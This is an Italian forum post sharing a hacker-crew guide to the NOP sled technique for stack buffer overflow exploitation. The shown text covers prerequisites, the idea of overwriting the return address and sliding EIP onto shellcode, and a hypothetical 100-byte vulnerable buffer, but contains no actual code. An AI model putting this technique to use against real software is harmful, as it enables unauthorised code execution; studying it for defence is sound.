Discussione [Guida] Applicare la tecnica del Nop Sled nelle applicazioni vulnerabili a Stack Overflow

D3x3

Utente Bronze
17 Giugno 2018
56
13
40
48
La guida è stata creata da un ex membro della mia crew, gli ho dato uno sguardo veloce ma non dovrebbe avere problemi. Mi è stata utile in varie situazioni, e non ho trovato molte guide in italiano che parlano di questa tecnica. Tra l'altro questa guida credo non sia affatto presente nel web, per motivi che non starò a descrivere. In ogni caso se avete domande sono a disposizione, premettendo che non sono esperto nella creazione di exploit, ma qualcosa la so :)

# Title: Applicare la tecnica del Nop Sled nelle applicazioni vulnerabili a Stack Overflow
# Written by: {~[.:_UnderScore_:.]~}
# Thanks to member of Dark Generation Crew: G0ld3n dr4g0n & Letal_Axel

Prerequisiti:
-Conoscenza elementare del linguaggio C;
-Conoscenza dei registri della CPU;
-Conoscenza del funzionamento di un programma a basso livello;
-Conoscenza avanzata della teoria sul Buffer Overflow;

Bene, cominciamo.
Quando si devono exploitare applicazioni vulnerabili a stack overflow ci si deve accertare che il proprio Shell Code venga eseguito. Per fare questo bisogna sovrascrivere competamente l' indirizzo di ret (precedentemente pushato sullo stack) con l' indirizzo del proprio shell code. Ma come si fa a conoscere l' indirizzo preciso dello shell code? Ci sono molte tecniche, tra queste il NOP Sled. C'è da precisare una cosa: il NOP Sled non è una tecnica con la quale si ottiene l' indirizzo dello shell code ma una tecnica per far "scivolare" EIP sullo Shell Code.

Ammettiamo di avere un programma vulnerabile che copia in un buffer dii 100 bytes argv[1] e supponiamo di conoscere già l' indirizzo che contiene ESP (Stack Pointer che conterrà un NOP) dopo aver ricevuto il segnale di SIGSEGV.